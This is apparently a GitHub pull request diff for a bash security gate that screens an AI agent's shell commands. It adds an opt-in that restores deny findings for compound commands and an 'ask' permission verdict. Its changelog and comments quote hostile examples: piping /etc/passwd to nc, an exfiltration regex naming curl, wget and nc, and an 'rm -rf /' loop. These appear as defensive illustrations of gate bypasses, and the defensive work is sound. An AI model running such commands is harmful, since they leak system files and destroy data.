Skip to content
Merged
Show file tree
Hide file tree
Changes from 8 commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
23 changes: 23 additions & 0 deletions CHANGELOG.md
Original file line number Diff line number Diff line change
Expand Up @@ -5,6 +5,26 @@ All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).

## [Unreleased]

### Added

- **Opt-in to re-enable `BASH-PARSER-COMPOUND` deny findings.** The 0.63.2
compound-allow change was a deliberate widening of the bash gate's
allowlist: the L4 parser stopped emitting a CRITICAL deny on every
`|`, `&&`, `||`, `;`, and control-flow construct, relying on
per-segment classifiers and the L2 regex layer to catch dangerous
payloads. Operators with stricter threat models can now restore the
pre-0.63.2 policy via either of:
  - Environment variable `SPELLBOOK_BASH_DENY_COMPOUND=1` (truthy values:
    `1`, `true`, `yes`, case-insensitive).
  - Passing `security_mode="paranoid"` to
    `spellbook.gates.bash_parser.parse_and_check` (call-site control).

  Either path re-emits `BASH-PARSER-COMPOUND` for `list` / `pipeline`
  nodes AND for `if` / `for` / `while` / `until` / `case` / `function`
  control-flow constructs. With neither opt-in active, default behavior
  is unchanged from 0.63.2.

## [0.64.1] - 2026-05-08

### Fixed
Expand Down Expand Up @@ -112,6 +132,9 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
`_classify_compound` now returns `[]`, and the if/for/while/until/case
control-flow branch no longer emits COMPOUND either; the walker still
recurses so nested CMDSUB/DIRECT-SHELL/etc. continue to surface.
Operators who relied on compound-deny as a policy boundary should
review the new opt-in introduced in [Unreleased] (see
`SPELLBOOK_BASH_DENY_COMPOUND` and `security_mode='paranoid'`).
- **EXF-007 broadened to plug a pipe-to-network-tool exfiltration gap.**
The previous regex `echo\s+.*\|\s*(curl|wget|nc)` restricted the LHS
of the pipe to `echo`, leaving `cat /etc/passwd | nc HOST PORT`
Expand Down
76 changes: 61 additions & 15 deletions hooks/spellbook_hook.py
Original file line number Diff line number Diff line change
Expand Up @@ -348,13 +348,66 @@ def _validate_tool_use_id(tool_use_id: str) -> bool:
# Handlers: Security gates (FAIL-CLOSED)
# ---------------------------------------------------------------------------

def _handle_check_result(result: dict) -> None:
"""Process a ``check_tool_input`` result, exiting if the gate denies or asks.

On ``verdict == "ask"``: delegates to :func:`_emit_ask_and_exit` (which
exits 0 with a ``permissionDecision`` JSON on stdout).
On ``safe == False``: prints the error JSON to stderr and exits 2 (block).
Otherwise returns silently (allow).
"""
if result.get("verdict") == "ask":
_emit_ask_and_exit(result["findings"])
if not result["safe"]:
reasons = "; ".join(f["message"] for f in result["findings"])
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

medium

The reasons string is constructed from the messages of all findings in the result, which can include LOW severity findings. Since a block is triggered only by non-LOW severity findings, including messages from LOW severity findings could add noise to the error message.

To make the error message more precise, consider filtering for non-LOW severity findings when building the reasons string.

Suggested change
reasons = "; ".join(f["message"] for f in result["findings"])
reasons = "; ".join(f["message"] for f in result["findings"] if f.get("severity") != "LOW")

print(json.dumps({"error": f"Security check failed: {reasons}"}), file=sys.stderr)
sys.exit(2)


def _emit_ask_and_exit(findings: list[dict]) -> None:
    """Print a ``permissionDecision: "ask"`` hook payload and exit 0.

    Called when ``check_tool_input`` reports ``verdict == "ask"``, i.e.
    every non-LOW finding is a TIER-ASK (e.g. ``git push``,
    ``gh pr merge``). The harness then shows a permission prompt the
    operator can approve from inside the session; T3 deny still goes
    through the exit-2 path instead of this function.

    Args:
        findings: Finding dicts from the check result. Only findings whose
            ``rule_id`` starts with ``TIER-ASK`` contribute to the reason;
            a missing ``rule_id`` or ``message`` is read as ``""``.

    Raises:
        SystemExit: Always, with exit code 0, after the JSON is printed.
    """
    # Collect only the TIER-ASK messages; other findings are left out of
    # the prompt text.
    ask_messages = []
    for finding in findings:
        if finding.get("rule_id", "").startswith("TIER-ASK"):
            ask_messages.append(finding.get("message", ""))

    payload = {
        "hookSpecificOutput": {
            "hookEventName": "PreToolUse",
            "permissionDecision": "ask",
            "permissionDecisionReason": "; ".join(ask_messages),
        }
    }
    # The decision goes to stdout, paired with a zero exit status.
    print(json.dumps(payload))
    sys.exit(0)


def _gate_bash(data: dict) -> None:
"""Security: validate bash commands. FAIL-CLOSED.

Calls check_tool_input from the security module. If the check finds
dangerous patterns, exits with code 2 and a structured error on stdout.
Calls check_tool_input from the security module. The ``verdict`` field
selects the action:

- ``"allow"``: no findings above LOW; return silently.
- ``"ask"``: only TIER-ASK findings (T2, e.g. ``git push``); emit
``permissionDecision: "ask"`` and exit 0 so the harness surfaces
a permission prompt.
- ``"deny"``: TIER-DENY (T3), CRITICAL bashlex/exfil findings, or
any mix containing a non-ask finding; exit 2 with a structured
error on stderr. Error messages never include blocked content
(anti-reflection).

If the security module cannot be imported, blocks (fail-closed).
Error messages never include blocked content (anti-reflection).
"""
try:
from spellbook.gates.check import check_tool_input
Expand All @@ -369,16 +422,14 @@ def _gate_bash(data: dict) -> None:
sys.exit(2)

result = check_tool_input("Bash", tool_input)
if not result["safe"]:
reasons = "; ".join(f["message"] for f in result["findings"])
print(json.dumps({"error": f"Security check failed: {reasons}"}), file=sys.stderr)
sys.exit(2)
_handle_check_result(result)


def _gate_spawn(data: dict) -> None:
"""Security: validate spawn prompts. FAIL-CLOSED.

Normalizes tool_name from MCP prefix to bare name before checking.
See :func:`_gate_bash` for the verdict / exit-code contract.
"""
try:
from spellbook.gates.check import check_tool_input
Expand All @@ -393,16 +444,14 @@ def _gate_spawn(data: dict) -> None:
sys.exit(2)

result = check_tool_input("spawn_claude_session", tool_input)
if not result["safe"]:
reasons = "; ".join(f["message"] for f in result["findings"])
print(json.dumps({"error": f"Security check failed: {reasons}"}), file=sys.stderr)
sys.exit(2)
_handle_check_result(result)


def _gate_state_sanitize(data: dict) -> None:
"""Security: validate workflow state. FAIL-CLOSED.

Normalizes tool_name from MCP prefix to bare name before checking.
See :func:`_gate_bash` for the verdict / exit-code contract.
"""
try:
from spellbook.gates.check import check_tool_input
Expand All @@ -417,10 +466,7 @@ def _gate_state_sanitize(data: dict) -> None:
sys.exit(2)

result = check_tool_input("workflow_state_save", tool_input)
if not result["safe"]:
reasons = "; ".join(f["message"] for f in result["findings"])
print(json.dumps({"error": f"Security check failed: {reasons}"}), file=sys.stderr)
sys.exit(2)
_handle_check_result(result)


# ---------------------------------------------------------------------------
Expand Down
126 changes: 90 additions & 36 deletions spellbook/gates/bash_parser.py
Original file line number Diff line number Diff line change
Expand Up @@ -359,15 +359,18 @@ def _finding(
# ---------------------------------------------------------------------------


def parse_and_check(command: str, security_mode: str = "paranoid") -> list[dict]:
def parse_and_check(command: str, security_mode: str = "standard") -> list[dict]:
"""Parse ``command`` with bashlex and emit deny findings.

Args:
command: The raw Bash tool invocation string.
security_mode: ``"standard"`` or ``"paranoid"`` (matches
:mod:`spellbook.gates.rules`). The bashlex parser treats both
equally — every category is paranoid by design — but the
argument is preserved for symmetry with ``check_patterns``.
security_mode: ``"standard"`` (default) or ``"paranoid"`` (matches
:mod:`spellbook.gates.rules`). ``"standard"`` matches the
post-0.63.2 public default — compound commands are allowed and
the per-segment classifiers do the work. ``"paranoid"``
re-enables ``BASH-PARSER-COMPOUND`` for compound and
control-flow constructs (alternatively, set
``SPELLBOOK_BASH_DENY_COMPOUND=1``).

Returns:
List of finding dicts. Empty list = no parser objection.
Expand Down Expand Up @@ -401,7 +404,7 @@ def parse_and_check(command: str, security_mode: str = "paranoid") -> list[dict]

findings: list[dict] = []
for tree in trees:
findings.extend(_walk(tree, command))
findings.extend(_walk(tree, command, security_mode))
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

high

The parse_and_check function (at line 362) defaults security_mode to "paranoid". Since _compound_deny_enabled now returns True for "paranoid", this change effectively enables compound-command denial by default for direct callers of this function, which contradicts the PR description's claim that default behavior is unchanged. Additionally, the docstring at line 367 is now inaccurate as it states the modes are treated equally. Consider changing the default to "standard" and updating the docstring.

return findings


Expand All @@ -410,14 +413,14 @@ def parse_and_check(command: str, security_mode: str = "paranoid") -> list[dict]
# ---------------------------------------------------------------------------


def _walk(node: object, command: str) -> list[dict]:
def _walk(node: object, command: str, security_mode: str) -> list[dict]:
"""Recursively classify ``node`` and its children.

Top-level dispatch sits in :func:`_classify_node` so the test suite can
drive the unknown-node fail-closed path with a synthetic node.
"""
findings: list[dict] = []
findings.extend(_classify_node(node))
findings.extend(_classify_node(node, security_mode))

# Recurse into children in a kind-aware manner so we do not double-count
# parent findings or miss nested substitutions.
Expand All @@ -429,15 +432,15 @@ def _walk(node: object, command: str) -> list[dict]:
# Operators and pipes are leaves; nothing to recurse into.
if child_kind in {"operator", "pipe", "reservedword"}:
continue
findings.extend(_walk(child, command))
findings.extend(_walk(child, command, security_mode))
elif kind == "compound":
# CompoundNode wraps control-flow constructs (if/for/while/until/case
# and function bodies). The wrapped construct(s) live under ``.list``,
# NOT ``.parts`` — without recursing into ``.list`` the walker would
# silently skip every nested command, providing a clean bypass for
# ``while true; do rm -rf /; done`` and similar.
for child in getattr(node, "list", ()) or ():
findings.extend(_walk(child, command))
findings.extend(_walk(child, command, security_mode))
elif kind == "command":
# Command parts contain Words (with possibly nested commandsub /
# processsub), Assignments, and Redirects. We classified the
Expand All @@ -450,41 +453,41 @@ def _walk(node: object, command: str) -> list[dict]:
# Words can hold nested commandsubstitution /
# processsubstitution under .parts.
for sub in getattr(part, "parts", ()) or ():
findings.extend(_walk(sub, command))
findings.extend(_walk(sub, command, security_mode))
elif part_kind == "redirect":
# Classify the redirect itself (deny-list path check), THEN
# recurse into its output target — a WordNode whose ``.parts``
# may contain a CommandsubstitutionNode (``ls > $(whoami).txt``).
findings.extend(_classify_node(part))
findings.extend(_classify_node(part, security_mode))
output = getattr(part, "output", None)
if output is not None:
for sub in getattr(output, "parts", ()) or ():
findings.extend(_walk(sub, command))
findings.extend(_walk(sub, command, security_mode))
elif part_kind == "assignment":
# Classify the env-prefix itself, THEN recurse into the
# assignment's parts so a CMDSUB inside the value
# (``VAR=$(whoami) ls``) is detected.
findings.extend(_classify_node(part))
findings.extend(_classify_node(part, security_mode))
for sub in getattr(part, "parts", ()) or ():
findings.extend(_walk(sub, command))
findings.extend(_walk(sub, command, security_mode))
else:
findings.extend(_walk(part, command))
findings.extend(_walk(part, command, security_mode))
elif kind in {"commandsubstitution", "processsubstitution"}:
inner = getattr(node, "command", None)
if inner is not None:
findings.extend(_walk(inner, command))
findings.extend(_walk(inner, command, security_mode))
elif kind in {"if", "for", "while", "until", "case", "function"}:
for child in getattr(node, "parts", ()) or ():
child_kind = getattr(child, "kind", None)
if child_kind in {"operator", "pipe", "reservedword"}:
continue
findings.extend(_walk(child, command))
findings.extend(_walk(child, command, security_mode))
elif kind == "word":
# Top-level / orphaned WordNode: walk its parts so a command-sub
# inside (``echo prefix$(whoami)suffix``) is still detected when
# the parent walker forwarded the word directly.
for sub in getattr(node, "parts", ()) or ():
findings.extend(_walk(sub, command))
findings.extend(_walk(sub, command, security_mode))

return findings

Expand All @@ -494,7 +497,7 @@ def _walk(node: object, command: str) -> list[dict]:
# ---------------------------------------------------------------------------


def _classify_node(node: object) -> list[dict]:
def _classify_node(node: object, security_mode: str) -> list[dict]:
"""Emit findings for a single AST node based on its ``kind``.

Unknown kinds fail closed with an audit-log entry, unless the operator
Expand All @@ -503,13 +506,25 @@ def _classify_node(node: object) -> list[dict]:
kind = getattr(node, "kind", None)

if kind in {"list", "pipeline"}:
return _classify_compound(node)
if kind in {"if", "for", "while", "until", "case"}:
# Control-flow constructs are compound by nature; we allow the
# structure itself. The walker still recurses into the body so
# any nested CMDSUB / dangerous redirect / direct-shell / etc.
# surfaces from per-segment classification, and the L2 regex layer
# catches dangerous payloads anywhere in the full command string.
return _classify_compound(node, security_mode)
if kind in {"if", "for", "while", "until", "case", "function"}:
# Control-flow constructs (and function definitions) are compound by
# nature. Default behavior: allow the structure itself; the walker
# still recurses into the body so any nested CMDSUB / dangerous
# redirect / direct-shell / etc. surfaces from per-segment
# classification, and the L2 regex layer catches dangerous payloads
# anywhere in the full command string. Under either compound-deny
# opt-in, emit a uniform deny finding naming the construct.
if _compound_deny_enabled(security_mode):
return [
_finding(
"BASH-PARSER-COMPOUND",
"CRITICAL",
f"Compound control-flow construct (`{kind}`) is not allowed; "
"split into separate Bash invocations.",
_node_text(node),
)
]
return []
if kind == "command":
return _classify_command(node)
Expand Down Expand Up @@ -550,17 +565,38 @@ def _classify_node(node: object) -> list[dict]:
# ---------------------------------------------------------------------------


def _classify_compound(node: object) -> list[dict]:
"""Compound command structure (list / pipeline) is allowed.
def _classify_compound(node: object, security_mode: str) -> list[dict]:
"""Compound command structure (list / pipeline).

The L4 walker still recurses into each command sub-node and applies
per-command classifiers (env-prefix, shellout, wrapper, direct-shell,
redirect, cmdsub) to every segment. Dangerous payloads anywhere in
a compound chain are caught by the L2 substring regex layer
(``DANGEROUS_BASH_PATTERNS`` / ``EXFILTRATION_RULES``) and by the L4
per-segment classifiers.
Default behavior (neither opt-in active): allowed. The L4 walker still
recurses into each command sub-node and applies per-command classifiers
(env-prefix, shellout, wrapper, direct-shell, redirect, cmdsub) to every
segment. Dangerous payloads anywhere in a compound chain are caught by
the L2 substring regex layer (``DANGEROUS_BASH_PATTERNS`` /
``EXFILTRATION_RULES``) and by the L4 per-segment classifiers.

Under either opt-in (``security_mode="paranoid"`` or
``SPELLBOOK_BASH_DENY_COMPOUND=1``), emit a uniform deny finding for
every compound regardless of segment count or operator mix.
"""
return []
if not _compound_deny_enabled(security_mode):
return []
parts = getattr(node, "parts", ()) or ()
operators = [
getattr(p, "op", "|") if getattr(p, "kind", None) == "pipe" else getattr(p, "op", None)
for p in parts
if getattr(p, "kind", None) in {"operator", "pipe"}
]
op_text = ", ".join(dict.fromkeys(op for op in operators if op)) or "|"
return [
_finding(
"BASH-PARSER-COMPOUND",
"CRITICAL",
f"Compound command ({op_text}) is not allowed; "
"split into separate Bash invocations.",
_node_text(node),
)
]


# ---------------------------------------------------------------------------
Expand Down Expand Up @@ -1164,6 +1200,24 @@ def _env_allowlist() -> frozenset[str]:
return frozenset(s.strip() for s in raw.split(",") if s.strip())


def _compound_deny_enabled(security_mode: str) -> bool:
    """Report whether compound-command deny findings should be emitted.

    Either opt-in is sufficient:

    - call-site: ``security_mode`` is exactly ``"paranoid"``;
    - operator: the ``SPELLBOOK_BASH_DENY_COMPOUND`` environment variable,
      after stripping whitespace and lower-casing, is one of ``1``,
      ``true``, ``yes``.

    Args:
        security_mode: Mode string passed down from the caller.

    Returns:
        ``True`` when at least one opt-in is active, otherwise ``False``.
    """
    truthy = ("1", "true", "yes")
    # Short-circuit: the environment is only read when the call-site
    # opt-in is not set.
    return (
        security_mode == "paranoid"
        or os.environ.get("SPELLBOOK_BASH_DENY_COMPOUND", "").strip().lower() in truthy
    )


# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
Expand Down
Loading
Loading